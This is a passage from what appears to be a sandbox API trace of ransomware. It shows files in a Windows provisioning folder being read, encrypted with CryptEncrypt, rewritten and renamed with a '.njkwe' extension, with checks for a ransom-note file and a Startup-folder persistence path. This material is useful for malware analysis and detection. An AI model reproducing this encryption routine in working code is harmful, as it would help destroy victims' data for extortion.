CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.549] GetProcessHeap () returned 0xbe0000 [0076.549] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.549] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.550] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.550] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.550] GetProcessHeap () returned 0xbe0000 [0076.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.550] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.550] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.561] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.561] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.562] CloseHandle (hObject=0x43c) returned 1 [0076.562] GetProcessHeap () returned 0xbe0000 [0076.562] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.562] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\124__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\124__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\124__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.562] GetProcessHeap () returned 0xbe0000 [0076.562] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.562] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9051cd0d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9051cd0d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9051cd0d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="125__C~1.PRO")) returned 1 [0076.562] lstrcmpiW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.563] lstrcmpiW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.563] lstrcmpiW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.563] lstrcmpiW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.563] lstrcmpiW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.563] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml") returned 176 [0076.563] StrStrIW (lpFirst="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.563] lstrcmpW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.563] lstrcmpW (lpString1="125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.563] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\125__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\125__connections_cellular_alands mobiltelefon ab (finland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.563] GetTickCount () returned 0x11537b6 [0076.563] GetTickCount () returned 0x11537b6 [0076.563] GetTickCount () returned 0x11537b6 [0076.563] GetTickCount () returned 0x11537b6 [0076.563] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.563] GetProcessHeap () returned 0xbe0000 [0076.563] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.563] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0076.565] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.565] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0076.565] GetProcessHeap () returned 0xbe0000 [0076.565] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.565] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.565] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.565] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.565] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.565] CloseHandle (hObject=0x43c) returned 1 [0076.565] GetProcessHeap () returned 0xbe0000 [0076.565] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.566] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 196 [0076.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\125__connections_cellular_alands mobiltelefon ab (finland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\125__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\125__connections_cellular_alands mobiltelefon ab (finland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.566] GetProcessHeap () returned 0xbe0000 [0076.566] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.566] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9051cd0d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9051cd0d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9051cd0d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", cAlternateFileName="126__C~1.PRO")) returned 1 [0076.566] lstrcmpiW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.566] lstrcmpiW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.566] lstrcmpiW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.566] lstrcmpiW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.566] lstrcmpiW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.566] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml") returned 176 [0076.566] StrStrIW (lpFirst="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.567] lstrcmpW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.567] lstrcmpW (lpString1="126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.567] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\126__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\126__connections_cellular_alands mobiltelefon ab (finland)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.567] GetTickCount () returned 0x11537b6 [0076.567] GetTickCount () returned 0x11537b6 [0076.567] GetTickCount () returned 0x11537b6 [0076.567] GetTickCount () returned 0x11537b6 [0076.567] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.567] GetProcessHeap () returned 0xbe0000 [0076.567] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.567] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x29c, lpOverlapped=0x0) returned 1 [0076.569] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.569] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x29c, lpOverlapped=0x0) returned 1 [0076.569] GetProcessHeap () returned 0xbe0000 [0076.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.569] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.569] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.569] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.569] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.569] CloseHandle (hObject=0x43c) returned 1 [0076.569] GetProcessHeap () returned 0xbe0000 [0076.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.569] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 196 [0076.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\126__connections_cellular_alands mobiltelefon ab (finland)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\126__Connections_Cellular_Alands Mobiltelefon Ab (Finland)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\126__connections_cellular_alands mobiltelefon ab (finland)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.570] GetProcessHeap () returned 0xbe0000 [0076.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.570] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9051cd0d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9051cd0d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9051cd0d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="127__C~1.PRO")) returned 1 [0076.570] lstrcmpiW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.570] lstrcmpiW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.570] lstrcmpiW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.570] lstrcmpiW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.570] lstrcmpiW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.570] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml") returned 157 [0076.570] StrStrIW (lpFirst="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.570] lstrcmpW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.570] lstrcmpW (lpString1="127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.570] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\127__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.570] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\127__connections_cellular_dna (finland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.571] GetTickCount () returned 0x11537b6 [0076.571] GetTickCount () returned 0x11537b6 [0076.571] GetTickCount () returned 0x11537b6 [0076.571] GetTickCount () returned 0x11537b6 [0076.571] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.571] GetProcessHeap () returned 0xbe0000 [0076.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.571] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x27f, lpOverlapped=0x0) returned 1 [0076.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.575] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x27f, lpOverlapped=0x0) returned 1 [0076.575] GetProcessHeap () returned 0xbe0000 [0076.575] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.575] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.575] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.602] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.603] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.603] CloseHandle (hObject=0x43c) returned 1 [0076.603] GetProcessHeap () returned 0xbe0000 [0076.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.603] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0076.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\127__connections_cellular_dna (finland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\127__Connections_Cellular_DNA (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\127__connections_cellular_dna (finland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.607] GetProcessHeap () returned 0xbe0000 [0076.607] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.607] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9051cd0d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9051cd0d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9051cd0d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="128__C~1.PRO")) returned 1 [0076.608] lstrcmpiW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.608] lstrcmpiW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.608] lstrcmpiW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.608] lstrcmpiW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.608] lstrcmpiW (lpString1="128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.608] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\128__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.608] StrStrIW 